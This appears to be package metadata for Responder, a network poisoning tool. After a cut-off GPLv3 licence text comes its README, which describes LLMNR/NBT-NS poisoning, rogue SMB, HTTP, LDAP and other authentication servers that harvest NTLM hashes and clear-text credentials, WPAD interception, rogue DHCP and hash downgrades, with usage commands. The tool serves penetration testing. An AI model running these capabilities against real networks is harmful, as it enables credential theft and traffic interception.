attributed erroneously to - authors of previous versions. - - Some devices are designed to deny users access to install or run - modified versions of the software inside them, although the manufacturer - can do so. This is fundamentally incompatible with the aim of - protecting users' freedom to change the software. The systematic - pattern of such abuse occurs in the area of products for individuals to - use, which is precisely where it is most unacceptable. Therefore, we - have designed this version of the GPL to prohibit the practice for those - products. If such problems arise substantially in other domains, we - stand ready to extend this provision to those domains in future versions - of the GPL, as needed to protect the freedom of users. - - Finally, every program is threatened constantly by software patents. - States should not allow patents to restrict development and use of - software on general-purpose computers, but in those that do, we wish to - avoid the special danger that patents applied to a free program could - make it effectively proprietary. To prevent this, the GPL assures that - patents cannot be used to render the program non-free. - - The precise terms and conditions for copying, distribution and - modification follow. - - TERMS AND CONDITIONS - - 0. Definitions. - - "This License" refers to version 3 of the GNU General Public License. - - "Copyright" also means copyright-like laws that apply to other kinds of - works, such as semiconductor masks. - - "The Program" refers to any copyrightable work licensed under this - License. Each licensee is addressed as "you". "Licensees" and - "recipients" may be individuals or organizations. - - To "modify" a work means to copy from or adapt all or part of the work - in a fashion requiring copyright permission, other than the making of an - exact copy. The resulting work is called a "modified version" of the - earlier work or a work "based on" the earlier work. - - A "covered work" means either the unmodified Program or a work based - on the Program. - - To "propagate" a work means to do anything with it that, without - permission, would make you directly or secondarily liable for - infringement under applicable copyright law, except executing it on a - computer or modifying a private copy. Propagation includes copying, - distribution (with or without modification), making available to the - public, and in some countries other activities as well. - - To "convey" a work means any kind of propagation that enables other - parties to make or receive copies. Mere interaction with a user through - a computer network, with no transfer of a copy, is not conveying. - - An interactive user interface displays "Appropriate Legal Notices" - to the extent that it includes a convenient and prominently visible - feature that (1) displays an appropriate copyright notice, and (2) - tells the user that there is no warranty for the work (except to the - extent that warranties are provided), that licensees may convey the - work under this License, and how to view a copy of this License. If - the interface presents a list of user commands or options, such as a - menu, a prominent item in the list meets this criterion. - - 1. Source Code. - - The "source code" for a work means the preferred form of the work - for making modifications to it. "Object code" means any non-source - form of a work. - - A "Standard Interface" means an interface that either is an official - standard defined by a recognized standards body, or, in the case of - interfaces specified for a particular programming language, one that - is widely used among developers working in that language. - - The "System Libraries" of an executable work include anything, other - than the work as a whole, that (a) is included in the normal form of - packaging a Major Component, but which is not part of that Major - Component, and (b) serves only to enable use of the work with that - Major Component, or to implement a Standard Interface for which an - implementation is available to the public in source code form. A - "Major Component", in this context, means a major essential component - (kernel, window system, and so on) of the specific operating system - (if any) on which the executable work runs, or a compiler used to - produce the work, or an object code interpreter used to run it. - - The "Corresponding Source" for a work in object code form means all - the source code needed to generate, install, and (for an executable - work) run the object code and to modify the work, including scripts to - control those activities. However, it does not include the work's - System Libraries, or general-purpose tools or generally available free - programs which are used unmodified in performing those activities but - which are not part of the work. For example, Corresponding Source - includes interface definition files associated with source files for - the work, and the source code for shared libraries and dynamically - linked subprograms that the work is specifically designed to require, - such as by intimate data communication or control flow between those - subprograms and other parts of the work. - - The Corresponding Source need not include anything that users - can regenerate automatically from other parts of the Corresponding - Source. - - The Corresponding Source for a work in source code form is that - same work. - - 2. Basic Permissions. - - All rights granted under this License are granted for the term of - copyright on the Program, and are irrevocable provided the stated - conditions are met. This License explicitly affirms your unlimited - permission to run the unmodified Program. The output from running a - covered work is covered by this License only if the output, given its - content, constitutes a covered work. This License acknowledges your - rights of fair use or other equivalent, as provided by copyright law. - - You may make, run and propagate covered works that you do not - convey, without conditions so long as your license otherwise remains - in force. You may convey covered works to others for the sole purpose - of having them make modifications exclusively for you, or provide you - with facilities for running those works, provided that you comply with - the terms of this License in conveying all material for which you do - not control copyright. Those thus making or running the covered works - for you must do so exclusively on your behalf, under your direction - and control, on terms that prohibit them from making any copies of - your copyrighted material outside their relationship with you. - - Conveying under any other circumstances is permitted solely under - the conditions stated below. Sublicensing is not allowed; section 10 - makes it unnecessary. - - 3. Protecting Users' Legal Rights From Anti-Circumvention Law. - - No covered work shall be deemed part of an effective technological - measure under any applicable law fulfilling obligations under article - 11 of the WIPO copyright treaty adopted on 20 December 1996, or - similar laws prohibiting or restricting circumvention of such - measures. - - When you convey a covered work, you waive any legal power to forbid - circumvention of technological measures to the extent such circumvention - is effected by exercising rights under this License with respect to - the covered work, and you disclaim any intention to limit operation or - modification of the work as a means of enforcing, against the work's - users, your or third parties' legal rights to forbid circumvention of - technological measures. - - 4. Conveying Verbatim Copies. - - You may convey verbatim copies of the Program's source code as you - receive it, in any medium, provided that you conspicuously and - appropriately publish on each copy an appropriate copyright notice; - keep intact all notices stating that this License and any - non-permissive terms added in accord with section 7 apply to the code; - keep intact all notices of the absence of any warranty; and give all - recipients a copy of this License along with the Program. - - You may charge any price or no price for each copy that you convey, - and you may offer support or warranty protection for a fee. - - 5. Conveying Modified Source Versions. - - You may convey a work based on the Program, or the modifications to - produce it from the Program, in the form of source code under the - terms of section 4, provided that you also meet all of these conditions: - - a) The work must carry prominent notices stating that you modified - it, and giving a relevant date. - - b) The work must carry prominent notices stating that it is - released under this License and any conditions added under section - 7. This requirement modifies the requirement in section 4 to - "keep intact all notices". - - c) You must license the entire work, as a whole, under this - License to anyone who comes into possession of a copy. This - License will therefore apply, along with any applicable section 7 - additional terms, to the whole of the work, and all its parts, - regardless of how they are packaged. This License gives no - permission to license the work in any other way, but it does not - invalidate such permission if you have separately received it. - - d) If the work has interactive user interfaces, each must display - Appropriate Legal Notices; however, if the Program has interactive - interfaces that do not display Appropriate Legal Notices, your - work need not make them do so. - - A compilation of a covered work with other separate and independent - works, which are not by their nature extensions of the covered work, - and which are not combined with it such as to form a larger program, - in or on a volume of a storage or distribution medium, is called an - "aggregate" if the compilation and its resulting copyright are not - used to limit the access or legal rights of the compilation's users - beyond what the individual works permit. Inclusion of a covered work - in an aggregate does not cause this License to apply to the other - parts of the aggregate. - - 6. Conveying Non-Source Forms. - - You may convey a covered work in object code form under the terms - of sections 4 and 5, provided that you also convey the - machine-readable Corresponding Source under the terms of this License, - in one of these ways: - - a) Convey the object code in, or embodied in, a physical product - (including a physical distribution medium), accompanied by the - Corresponding Source fixed on a durable physical medium - customarily used for software interchange. - - b) Convey the object code in, or embodied in, a physical product - (including a physical distribution medium), accompanied by a - written offer, valid for at least three years and valid for as - long as you offer spare parts or customer support for that product - model, to give anyone who possesses the object code either (1) a - copy of the Corresponding Source for all the software in the - product that is covered by this License, on a durable physical - medium customarily used for software interchange, for a price no - more than your reasonable cost of physically performing this - conveying of source, or (2) access to copy the - Corresponding Source from a network server at no charge. - - c) Convey individual copies of the object code with a copy of the - written offer to provide the Corresponding Source. This - alternative is allowed only occasionally and noncommercially, and - only if you received the object code with such an offer, in accord - with subsection 6b. - - d) Convey the object code by offering access from a designated - place (gratis or for a charge), and offer equivalent access to the - Corresponding Source in the same way through the same place at no - further charge. You need not require recipients to copy the - Corresponding Source along with the object code. If the place to - copy the object code is a network server, the Corresponding Source - may be on a different server (operated by you or a third party) - that supports equivalent copying facilities, provided you maintain - clear directions next to the object code saying where to find the - Corresponding Source. Regardless of what server hosts the - Corresponding Source, you remain obligated to ensure that it is - available for as long as needed to satisfy these requirements. - - e) Convey the object code using peer-to-peer transmission, provided - you inform other peers where the object code and Corresponding - Source of the work are being offered to the general public at no - charge under subsection 6d. - - A separable portion of the object code, whose source code is excluded - from the Corresponding Source as a System Library, need not be - included in conveying the object code work. - - A "User Product" is either (1) a "consumer product", which means any - tangible personal property which is normally used for personal, family, - or household purposes, or (2) anything designed or sold for incorporation - into a dwelling. In determining whether a product is a consumer product, - doubtful cases shall be resolved in favor of coverage. For a particular - product received by a particular user, "normally used" refers to a - typical or common use of that class of product, regardless of the status - of the particular user or of the way in which the particular user - actually uses, or expects or is expected to use, the product. A product - is a consumer product regardless of whether the product has substantial - commercial, industrial or non-consumer uses, unless such uses represent - the only significant mode of use of the product. - - "Installation Information" for a User Product means any methods, - procedures, authorization keys, or other information required to install - and execute modified versions of a covered work in that User Product from - a modified version of its Corresponding Source. The information must - suffice to ensure that the continued functioning of the modified object - code is in no case prevented or interfered with solely because - modification has been made. - - If you convey an object code work under this section in, or with, or - specifically for use in, a User Product, and the conveying occurs as - part of a transaction in which the right of possession and use of the - User Product is transferred to the recipient in perpetuity or for a - fixed term (regardless of how the transaction is characterized), the - Corresponding Source conveyed under this section must be accompanied - by the Installation Information. But this requirement does not apply - if neither you nor any third party retains the ability to install - modified object code on the User Product (for example, the work has - been installed in ROM). - - The requirement to provide Installation Information does not include a - requirement to continue to provide support service, warranty, or updates - for a work that has been modified or installed by the recipient, or for - the User Product in which it has been modified or installed. Access to a - network may be denied when the modification itself materially and - adversely affects the operation of the network or violates the rules and - protocols for communication across the network. - - Corresponding Source conveyed, and Installation Information provided, - in accord with this section must be in a format that is publicly - documented (and with an implementation available to the public in - source code form), and must require no special password or key for - unpacking, reading or copying. - - 7. Additional Terms. - - "Additional permissions" are terms that supplement the terms of this - License by making exceptions from one or more of its conditions. - Additional permissions that are applicable to the entire Program shall - be treated as though they were included in this License, to the extent - that they are valid under applicable law. If additional permissions - apply only to part of the Program, that part may be used separately - under those permissions, but the entire Program remains governed by - this License without regard to the additional permissions. - - When you convey a copy of a covered work, you may at your option - remove any additional permissions from that copy, or from any part of - it. (Additional permissions may be written to require their own - removal in certain cases when you modify the work.) You may place - additional permissions on material, added by you to a covered work, - for which you have or can give appropriate copyright permission. - - Notwithstanding any other provision of this License, for material you - add to a covered work, you may (if authorized by the copyright holders of - that material) supplement the terms of this License with terms: - - a) Disclaiming warranty or limiting liability differently from the - terms of sections 15 and 16 of this License; or - - b) Requiring preservation of specified reasonable legal notices or - author attributions in that material or in the Appropriate Legal - Notices displayed by works containing it; or - - c) Prohibiting misrepresentation of the origin of that material, or - requiring that modified versions of such material be marked in - reasonable ways as different from the original version; or - - d) Limiting the use for publicity purposes of names of licensors or - authors of the material; or - - e) Declining to grant rights under trademark law for use of some - trade names, trademarks, or service marks; or - - f) Requiring indemnification of licensors and authors of that - material by anyone who conveys the material (or modified versions of - it) with contractual assumptions of liability to the recipient, for - any liability that these contractual assumptions directly impose on - those licensors and authors. - - All other non-permissive additional terms are considered "further - restrictions" within the meaning of section 10. If the Program as you - received it, or any part of it, contains a notice stating that it is - governed by this License along with a term that is a further - restriction, you may remove that term. If a license document contains - a further restriction but permits relicensing or conveying under this - License, you may add to a covered work material governed by the terms - of that license document, provided that the further restriction does - not survive such relicensing or conveying. - - If you add terms to a covered work in accord with this section, you - must place, in the relevant source files, a statement of the - additional terms that apply to those files, or a notice indicating - where to find the applicable terms. - - Additional terms, permissive or non-permissive, may be stated in the - form of a separately written license, or stated as exceptions; - the above requirements apply either way. - - 8. Termination. - - You may not propagate or modify a covered work except as expressly - provided under this License. Any attempt otherwise to propagate or - modify it is void, and will automatically terminate your rights under - this License (including any patent licenses granted under the third - paragraph of section 11). - - However, if you cease all violation of this License, then your - license from a particular copyright holder is reinstated (a) - provisionally, unless and until the copyright holder explicitly and - finally terminates your license, and (b) permanently, if the copyright - holder fails to notify you of the violation by some reasonable means - prior to 60 days after the cessation. - - Moreover, your license from a particular copyright holder is - reinstated permanently if the copyright holder notifies you of the - violation by some reasonable means, this is the first time you have - received notice of violation of this License (for any work) from that - copyright holder, and you cure the violation prior to 30 days after - your receipt of the notice. - - Termination of your rights under this section does not terminate the - licenses of parties who have received copies or rights from you under - this License. If your rights have been terminated and not permanently - reinstated, you do not qualify to receive new licenses for the same - material under section 10. - - 9. Acceptance Not Required for Having Copies. - - You are not required to accept this License in order to receive or - run a copy of the Program. Ancillary propagation of a covered work - occurring solely as a consequence of using peer-to-peer transmission - to receive a copy likewise does not require acceptance. However, - nothing other than this License grants you permission to propagate or - modify any covered work. These actions infringe copyright if you do - not accept this License. Therefore, by modifying or propagating a - covered work, you indicate your acceptance of this License to do so. - - 10. Automatic Licensing of Downstream Recipients. - - Each time you convey a covered work, the recipient automatically - receives a license from the original licensors, to run, modify and - propagate that work, subject to this License. You are not responsible - for enforcing compliance by third parties with this License. - - An "entity transaction" is a transaction transferring control of an - organization, or substantially all assets of one, or subdividing an - organization, or merging organizations. If propagation of a covered - work results from an entity transaction, each party to that - transaction who receives a copy of the work also receives whatever - licenses to the work the party's predecessor in interest had or could - give under the previous paragraph, plus a right to possession of the - Corresponding Source of the work from the predecessor in interest, if - the predecessor has it or can get it with reasonable efforts. - - You may not impose any further restrictions on the exercise of the - rights granted or affirmed under this License. For example, you may - not impose a license fee, royalty, or other charge for exercise of - rights granted under this License, and you may not initiate litigation - (including a cross-claim or counterclaim in a lawsuit) alleging that - any patent claim is infringed by making, using, selling, offering for - sale, or importing the Program or any portion of it. - - 11. Patents. - - A "contributor" is a copyright holder who authorizes use under this - License of the Program or a work on which the Program is based. The - work thus licensed is called the contributor's "contributor version". - - A contributor's "essential patent claims" are all patent claims - owned or controlled by the contributor, whether already acquired or - hereafter acquired, that would be infringed by some manner, permitted - by this License, of making, using, or selling its contributor version, - but do not include claims that would be infringed only as a - consequence of further modification of the contributor version. For - purposes of this definition, "control" includes the right to grant - patent sublicenses in a manner consistent with the requirements of - this License. - - Each contributor grants you a non-exclusive, worldwide, royalty-free - patent license under the contributor's essential patent claims, to - make, use, sell, offer for sale, import and otherwise run, modify and - propagate the contents of its contributor version. - - In the following three paragraphs, a "patent license" is any express - agreement or commitment, however denominated, not to enforce a patent - (such as an express permission to practice a patent or covenant not to - sue for patent infringement). To "grant" such a patent license to a - party means to make such an agreement or commitment not to enforce a - patent against the party. - - If you convey a covered work, knowingly relying on a patent license, - and the Corresponding Source of the work is not available for anyone - to copy, free of charge and under the terms of this License, through a - publicly available network server or other readily accessible means, - then you must either (1) cause the Corresponding Source to be so - available, or (2) arrange to deprive yourself of the benefit of the - patent license for this particular work, or (3) arrange, in a manner - consistent with the requirements of this License, to extend the patent - license to downstream recipients. "Knowingly relying" means you have - actual knowledge that, but for the patent license, your conveying the - covered work in a country, or your recipient's use of the covered work - in a country, would infringe one or more identifiable patents in that - country that you have reason to believe are valid. - - If, pursuant to or in connection with a single transaction or - arrangement, you convey, or propagate by procuring conveyance of, a - covered work, and grant a patent license to some of the parties - receiving the covered work authorizing them to use, propagate, modify - or convey a specific copy of the covered work, then the patent license - you grant is automatically extended to all recipients of the covered - work and works based on it. - - A patent license is "discriminatory" if it does not include within - the scope of its coverage, prohibits the exercise of, or is - conditioned on the non-exercise of one or more of the rights that are - specifically granted under this License. You may not convey a covered - work if you are a party to an arrangement with a third party that is - in the business of distributing software, under which you make payment - to the third party based on the extent of your activity of conveying - the work, and under which the third party grants, to any of the - parties who would receive the covered work from you, a discriminatory - patent license (a) in connection with copies of the covered work - conveyed by you (or copies made from those copies), or (b) primarily - for and in connection with specific products or compilations that - contain the covered work, unless you entered into that arrangement, - or that patent license was granted, prior to 28 March 2007. - - Nothing in this License shall be construed as excluding or limiting - any implied license or other defenses to infringement that may - otherwise be available to you under applicable patent law. - - 12. No Surrender of Others' Freedom. - - If conditions are imposed on you (whether by court order, agreement or - otherwise) that contradict the conditions of this License, they do not - excuse you from the conditions of this License. If you cannot convey a - covered work so as to satisfy simultaneously your obligations under this - License and any other pertinent obligations, then as a consequence you may - not convey it at all. For example, if you agree to terms that obligate you - to collect a royalty for further conveying from those to whom you convey - the Program, the only way you could satisfy both those terms and this - License would be to refrain entirely from conveying the Program. - - 13. Use with the GNU Affero General Public License. - - Notwithstanding any other provision of this License, you have - permission to link or combine any covered work with a work licensed - under version 3 of the GNU Affero General Public License into a single - combined work, and to convey the resulting work. The terms of this - License will continue to apply to the part which is the covered work, - but the special requirements of the GNU Affero General Public License, - section 13, concerning interaction through a network will apply to the - combination as such. - - 14. Revised Versions of this License. - - The Free Software Foundation may publish revised and/or new versions of - the GNU General Public License from time to time. Such new versions will - be similar in spirit to the present version, but may differ in detail to - address new problems or concerns. - - Each version is given a distinguishing version number. If the - Program specifies that a certain numbered version of the GNU General - Public License "or any later version" applies to it, you have the - option of following the terms and conditions either of that numbered - version or of any later version published by the Free Software - Foundation. If the Program does not specify a version number of the - GNU General Public License, you may choose any version ever published - by the Free Software Foundation. - - If the Program specifies that a proxy can decide which future - versions of the GNU General Public License can be used, that proxy's - public statement of acceptance of a version permanently authorizes you - to choose that version for the Program. - - Later license versions may give you additional or different - permissions. However, no additional obligations are imposed on any - author or copyright holder as a result of your choosing to follow a - later version. - - 15. Disclaimer of Warranty. - - THERE IS NO WARRANTY FOR THE PROGRAM, TO THE EXTENT PERMITTED BY - APPLICABLE LAW. EXCEPT WHEN OTHERWISE STATED IN WRITING THE COPYRIGHT - HOLDERS AND/OR OTHER PARTIES PROVIDE THE PROGRAM "AS IS" WITHOUT WARRANTY - OF ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING, BUT NOT LIMITED TO, - THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR - PURPOSE. THE ENTIRE RISK AS TO THE QUALITY AND PERFORMANCE OF THE PROGRAM - IS WITH YOU. SHOULD THE PROGRAM PROVE DEFECTIVE, YOU ASSUME THE COST OF - ALL NECESSARY SERVICING, REPAIR OR CORRECTION. - - 16. Limitation of Liability. - - IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING - WILL ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MODIFIES AND/OR CONVEYS - THE PROGRAM AS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES, INCLUDING ANY - GENERAL, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING OUT OF THE - USE OR INABILITY TO USE THE PROGRAM (INCLUDING BUT NOT LIMITED TO LOSS OF - DATA OR DATA BEING RENDERED INACCURATE OR LOSSES SUSTAINED BY YOU OR THIRD - PARTIES OR A FAILURE OF THE PROGRAM TO OPERATE WITH ANY OTHER PROGRAMS), - EVEN IF SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE POSSIBILITY OF - SUCH DAMAGES. - - 17. Interpretation of Sections 15 and 16. - - If the disclaimer of warranty and limitation of liability provided - above cannot be given local legal effect according to their terms, - reviewing courts shall apply local law that most closely approximates - an absolute waiver of all civil liability in connection with the - Program, unless a warranty or assumption of liability accompanies a - copy of the Program in return for a fee. - - END OF TERMS AND CONDITIONS - - How to Apply These Terms to Your New Programs - - If you develop a new program, and you want it to be of the greatest - possible use to the public, the best way to achieve this is to make it - free software which everyone can redistribute and change under these terms. - - To do so, attach the following notices to the program. It is safest - to attach them to the start of each source file to most effectively - state the exclusion of warranty; and each file should have at least - the "copyright" line and a pointer to where the full notice is found. - - - Copyright (C) - - This program is free software: you can redistribute it and/or modify - it under the terms of the GNU General Public License as published by - the Free Software Foundation, either version 3 of the License, or - (at your option) any later version. - - This program is distributed in the hope that it will be useful, - but WITHOUT ANY WARRANTY; without even the implied warranty of - MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the - GNU General Public License for more details. - - You should have received a copy of the GNU General Public License - along with this program. If not, see . - - Also add information on how to contact you by electronic and paper mail. - - If the program does terminal interaction, make it output a short - notice like this when it starts in an interactive mode: - - Copyright (C) - This program comes with ABSOLUTELY NO WARRANTY; for details type `show w'. - This is free software, and you are welcome to redistribute it - under certain conditions; type `show c' for details. - - The hypothetical commands `show w' and `show c' should show the appropriate - parts of the General Public License. Of course, your program's commands - might be different; for a GUI interface, you would use an "about box". - - You should also get your employer (if you work as a programmer) or school, - if any, to sign a "copyright disclaimer" for the program, if necessary. - For more information on this, and how to apply and follow the GNU GPL, see - . - - The GNU General Public License does not permit incorporating your program - into proprietary programs. If your program is a subroutine library, you - may consider it more useful to permit linking proprietary applications with - the library. If this is what you want to do, use the GNU Lesser General - Public License instead of this License. But first, please read - . - -Project-URL: Repository, https://github.com/lgandx/Responder -Project-URL: Issues, https://github.com/lgandx/Responder/issues -Project-URL: Changelog, https://github.com/lgandx/Responder/CHANGELOG.md -Keywords: LLMNR,Poisoning,Windows,SMB,Relay,NBT-NS,NTLM -Classifier: Intended Audience :: Developers -Classifier: License :: GPL -Classifier: Programming Language :: Python 3 -Classifier: Programming Language :: Python 3.6 -Classifier: Programming Language :: Python 3.7 -Classifier: Programming Language :: Python 3.8 -Classifier: Programming Language :: Python 3.9 -Classifier: Programming Language :: Python 3.10 -Classifier: Programming Language :: Python 3.11 -Classifier: Programming Language :: Python 3.12 -Requires-Python: >=3.6 -Description-Content-Type: text/markdown -License-File: LICENSE -Requires-Dist: netifaces>=0.10.4 - -# Responder/MultiRelay # - -IPv6/IPv4 LLMNR/NBT-NS/mDNS Poisoner and NTLMv1/2 Relay. - -Author: Laurent Gaffie https://g-laurent.blogspot.com - - - -## Intro ## - -Responder is an LLMNR, NBT-NS and MDNS poisoner. - -## Features ## - -- Dual IPv6/IPv4 stack. - -- Built-in SMB Auth server. - -Supports NTLMv1, NTLMv2 hashes with Extended Security NTLMSSP by default. Successfully tested from Windows 95 to Server 2022, Samba and Mac OSX Lion. Clear text password is supported for NT4, and LM hashing downgrade when the --lm option is set. If --disable-ess is set, extended session security will be disabled for NTLMv1 authentication. SMBv2 has also been implemented and is supported by default. - -- Built-in MSSQL Auth server. - -This server supports NTLMv1, LMv2 hashes. This functionality was successfully tested on Windows SQL Server 2005, 2008, 2012, 2019. - -- Built-in HTTP Auth server. - -This server supports NTLMv1, NTLMv2 hashes *and* Basic Authentication. This server was successfully tested on IE 6 to IE 11, Edge, Firefox, Chrome, Safari. - -Note: This module also works for WebDav NTLM authentication issued from Windows WebDav clients (WebClient). You can now send your custom files to a victim. - -- Built-in HTTPS Auth server. - -Same as above. The folder certs/ contains 2 default keys, including a dummy private key. This is *intentional*, the purpose is to have Responder working out of the box. A script was added in case you need to generate your own self signed key pair. - -- Built-in LDAP Auth server. - -This server supports NTLMSSP hashes and Simple Authentication (clear text authentication). This server was successfully tested on Windows Support tool "ldp" and LdapAdmin. - -- Built-in DCE-RPC Auth server. - -This server supports NTLMSSP hashes. This server was successfully tested on Windows XP to Server 2019. - -- Built-in FTP, POP3, IMAP, SMTP Auth servers. - -This modules will collect clear text credentials. - -- Built-in DNS server. - -This server will answer type SRV and A queries. This is really handy when it's combined with ARP spoofing. - -- Built-in WPAD Proxy Server. - -This module will capture all HTTP requests from anyone launching Internet Explorer on the network if they have "Auto-detect settings" enabled. This module is highly effective. You can configure your custom PAC script in Responder.conf and inject HTML into the server's responses. See Responder.conf. - -- Browser Listener - -This module allows to find the PDC in stealth mode. - -- Icmp Redirect - - python tools/Icmp-Redirect.py - -For MITM on Windows XP/2003 and earlier Domain members. This attack combined with the DNS module is pretty effective. - -- Rogue DHCP - - python tools/DHCP.py - -DHCP Inform Spoofing. Allows you to let the real DHCP Server issue IP addresses, and then send a DHCP Inform answer to set your IP address as a primary DNS server, and your own WPAD URL. To inject a DNS server, domain, route on all Windows version and any linux box, use -R - -- Analyze mode. - -This module allows you to see NBT-NS, BROWSER, LLMNR, DNS requests on the network without poisoning any responses. Also, you can map domains, MSSQL servers, workstations passively, see if ICMP Redirects attacks are plausible on your subnet. - -## Hashes ## - -All hashes are printed to stdout and dumped in a unique John Jumbo compliant file, using this format: - - (MODULE_NAME)-(HASH_TYPE)-(CLIENT_IP).txt - -Log files are located in the "logs/" folder. Hashes will be logged and printed only once per user per hash type, unless you are using the Verbose mode (-v). - -- Responder will log all its activity to Responder-Session.log -- Analyze mode will be logged to Analyzer-Session.log -- Poisoning will be logged to Poisoners-Session.log - -Additionally, all captured hashed are logged into an SQLite database which you can configure in Responder.conf - - -## Considerations ## - -- This tool listens on several ports: UDP 137, UDP 138, UDP 53, UDP/TCP 389,TCP 1433, UDP 1434, TCP 80, TCP 135, TCP 139, TCP 445, TCP 21, TCP 3141,TCP 25, TCP 110, TCP 587, TCP 3128, Multicast UDP 5355 and 5353. - -- If you run Samba on your system, stop smbd and nmbd and all other services listening on these ports. - -- For Ubuntu users: - -Edit this file /etc/NetworkManager/NetworkManager.conf and comment the line: `dns=dnsmasq`. Then kill dnsmasq with this command (as root): `killall dnsmasq -9` - -- Any rogue server can be turned off in Responder.conf. - -- This tool is not meant to work on Windows. - -- For OSX, please note: Responder must be launched with an IP address for the -i flag (e.g. -i YOUR_IP_ADDR). There is no native support in OSX for custom interface binding. Using -i en1 will not work. Also to run Responder with the best experience, run the following as root: - - launchctl unload /System/Library/LaunchDaemons/com.apple.Kerberos.kdc.plist - - launchctl unload /System/Library/LaunchDaemons/com.apple.mDNSResponder.plist - - launchctl unload /System/Library/LaunchDaemons/com.apple.smbd.plist - - launchctl unload /System/Library/LaunchDaemons/com.apple.netbiosd.plist - -## Usage ## - -First of all, please take a look at Responder.conf and tweak it for your needs. - -Running the tool: - - ./Responder.py [options] - -Typical Usage Example: - - ./Responder.py -I eth0 -Pv - -Options: - - --version show program's version number and exit - -h, --help show this help message and exit - -A, --analyze Analyze mode. This option allows you to see NBT-NS, - BROWSER, LLMNR requests without responding. - -I eth0, --interface=eth0 - Network interface to use, you can use 'ALL' as a - wildcard for all interfaces - -i 10.0.0.21, --ip=10.0.0.21 - Local IP to use (only for OSX) - -6 2002:c0a8:f7:1:3ba8:aceb:b1a9:81ed, --externalip6=2002:c0a8:f7:1:3ba8:aceb:b1a9:81ed - Poison all requests with another IPv6 address than - Responder's one. - -e 10.0.0.22, --externalip=10.0.0.22 - Poison all requests with another IP address than - Responder's one. - -b, --basic Return a Basic HTTP authentication. Default: NTLM - -d, --DHCP Enable answers for DHCP broadcast requests. This - option will inject a WPAD server in the DHCP response. - Default: False - -D, --DHCP-DNS This option will inject a DNS server in the DHCP - response, otherwise a WPAD server will be added. - Default: False - -w, --wpad Start the WPAD rogue proxy server. Default value is - False - -u UPSTREAM_PROXY, --upstream-proxy=UPSTREAM_PROXY - Upstream HTTP proxy used by the rogue WPAD Proxy for - outgoing requests (format: host:port) - -F, --ForceWpadAuth Force NTLM/Basic authentication on wpad.dat file - retrieval. This may cause a login prompt. Default: - False - -P, --ProxyAuth Force NTLM (transparently)/Basic (prompt) - authentication for the proxy. WPAD doesn't need to be - ON. Default: False - --lm Force LM hashing downgrade for Windows XP/2003 and - earlier. Default: False - --disable-ess Force ESS downgrade. Default: False - -v, --verbose Increase verbosity. - - - - -## Donation ## - -You can contribute to this project by donating to the following $XLM (Stellar Lumens) address: - -"GCGBMO772FRLU6V4NDUKIEXEFNVSP774H2TVYQ3WWHK4TEKYUUTLUKUH" - -Paypal: - -https://paypal.me/PythonResponder - - -## Acknowledgments ## - -Late Responder development has been possible because of the donations received from individuals and companies. - -We would like to thanks those major sponsors: - -- SecureWorks: https://www.secureworks.com/ - -- Synacktiv: https://www.synacktiv.com/ - -- Black Hills Information Security: http://www.blackhillsinfosec.com/ - -- TrustedSec: https://www.trustedsec.com/ - -- Red Siege Information Security: https://www.redsiege.com/ - -- Open-Sec: http://www.open-sec.com/ - -- And all, ALL the pentesters around the world who donated to this project. - -Thank you. - - -## Copyright ## - -NBT-NS/LLMNR Responder - -Responder, a network take-over set of tools created and maintained by Laurent Gaffie. - -email: laurent.gaffie@gmail.com - -This program is free software: you can redistribute it and/or modify -it under the terms of the GNU General Public License as published by -the Free Software Foundation, either version 3 of the License, or -(at your option) any later version. - -This program is distributed in the hope that it will be useful, -but WITHOUT ANY WARRANTY; without even the implied warranty of -MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the -GNU General Public License for more details. - -You should have received a copy of the GNU General Public License -along with this program. If not, see .